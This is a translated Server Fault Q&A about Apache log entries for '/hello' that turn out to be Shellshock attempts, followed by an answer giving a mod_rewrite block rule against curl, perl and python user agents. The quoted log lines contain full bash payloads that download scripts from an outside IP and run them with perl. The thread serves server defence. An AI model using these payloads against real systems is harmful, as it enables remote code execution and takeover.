Http-Status-Code-404

以“hello”作為 URL 的 Apache 404 錯誤

  • December 24, 2015

如果發生 404 錯誤,我的網路伺服器會向我發送電子郵件(以幫助我解決失去的連結)。我只有通常的404之類http://www.example.com/administrator的。

但最近我不斷收到請求http://www.example.com/hello。我似乎從世界各地得到它們。

185.63.188.120 - - [21/Dec/2015:08:35:54 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:08:35:55 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:16:17:11 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:16:17:12 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
172.246.105.114 - - [22/Dec/2015:08:25:12 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
172.246.105.114 - - [22/Dec/2015:08:25:13 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
80.248.216.11 - - [22/Dec/2015:16:33:41 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/BASHSALAM;wget http://188.138.41.134/BASHSALAM -O /tmp/BASHSALAM;wget http://188.138.41.134/BASHSALAM;perl BASHSALAM;perl BASHSALAM;rm -rf /tmp/BASHSALAM*\""
80.248.216.11 - - [22/Dec/2015:16:33:42 -0500] "GET /hello HTTP/1.0" 403 1809 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/BASHSALAM;wget http://188.138.41.134/BASHSALAM -O /tmp/BASHSALAM;wget http://188.138.41.134/BASHSALAM;perl BASHSALAM;perl BASHSALAM;rm -rf /tmp/BASHSALAM*\""
185.63.188.120 - - [22/Dec/2015:22:12:45 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [22/Dec/2015:22:12:46 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [23/Dec/2015:16:56:56 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/iod.exe;curl -O http://188.138.41.134/iod.exe;wget http://188.138.41.134/iod.exe;perl /tmp/iod.exe*;perl iod.exe;rm -rf /tmp/iod.exe*\""
185.63.188.120 - - [23/Dec/2015:16:56:57 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/iod.exe;curl -O http://188.138.41.134/iod.exe;wget http://188.138.41.134/iod.exe;perl /tmp/iod.exe*;perl iod.exe;rm -rf /tmp/iod.exe*\""

我意識到這是對我的伺服器的一次砲擊攻擊嘗試(伺服器已打更新檔)。

我的問題是:如何阻止此類攻擊?除了修補 bash,我還應該做些什麼來強化我的網路伺服器?有其他人在他們的 Apache 日誌中看到這些嗎?

我發現攻擊者非常狡猾的是,在他們的 URL 中使用“hello”讓Google很難找到答案。你會得到大量無用的結果。

如果您的系統是最新的,您不必擔心。

您可以製定自定義規則來防止大多數網路機器人攻擊,例如這是我的:

RewriteCond %{HTTP_USER_AGENT} ^-?$|curl|perl|python [NC,OR]
RewriteCond %{REQUEST_METHOD} !^(GET|HEAD|POST)$ [OR]
RewriteCond %{REQUEST_URI} !^/ [OR]
RewriteCond %{HTTP_REFERER} "!^$|^http"
RewriteRule .* - [END,R=406]

它將在機器人測試違規之前阻止大多數攻擊:

  • 阻止空使用者代理或可疑代理
  • 限制對 GET HEAD 和 POST 的請求
  • 阻止不以 / 開頭的請求(如果您不將伺服器用作代理,則所有請求都應以 / 開頭)
  • 阻止具有無效 REFERER 的請求

我使用程式碼 406,但您可以將其更改為您喜歡的任何其他程式碼。

如果您需要有關漏洞利用的更多資訊:

引用自:https://serverfault.com/questions/745160